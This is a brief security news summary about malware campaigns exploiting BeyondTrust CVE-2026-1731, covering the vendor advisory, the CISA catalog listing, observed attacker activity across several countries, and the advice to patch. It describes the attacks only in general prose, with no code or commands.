VSHELL and SparkRAT have been observed exploiting BeyondTrust CVE-2026-1731, a pre-authentication remote code execution flaw in the thin-scc-wrapper component of unpatched BeyondTrust remote support software. On 6 February 2026 BeyondTrust issued a security advisory, and the U.S. CISA added CVE-2026-1731 to its Known Exploited Vulnerabilities catalog on 13 February 2026, prompting urgent remediation for both public sector and private sector organisations.
Unit 42 reports activity consistent with network reconnaissance, account creation, webshell deployment, C2 traffic, backdoor and remote management tool deployment, lateral movement and data theft, with attacks observed across sectors in the US, France, Germany, Australia and Canada.
In its telemetry, Palo Alto Networks noted 10,600-plus exposed instances vulnerable to CVE-2026-1731, reinforcing the need for rapid patching and protective measures across product lines including Cortex XDR, Xpanse and related cloud-delivered services. The campaign also features Malware like SparkRAT and VShell, alongside PowerShell and Bash delivery methods, with attackers attempting to exfiltrate data from configuration files, internal databases and PostgreSQL dumps.
For organisations self-hosted on BeyondTrust, the advisory recommends manual patching of non‑automatic-update instances, with specific upgrade paths for Remote Support and Privileged Remote Access as described in the note. According to Beyond Trust advisory, this remains a high-risk, actively exploited vulnerability, underscoring the importance of defence-in-depth and restricted administrative interfaces to limit impact should new variants emerge.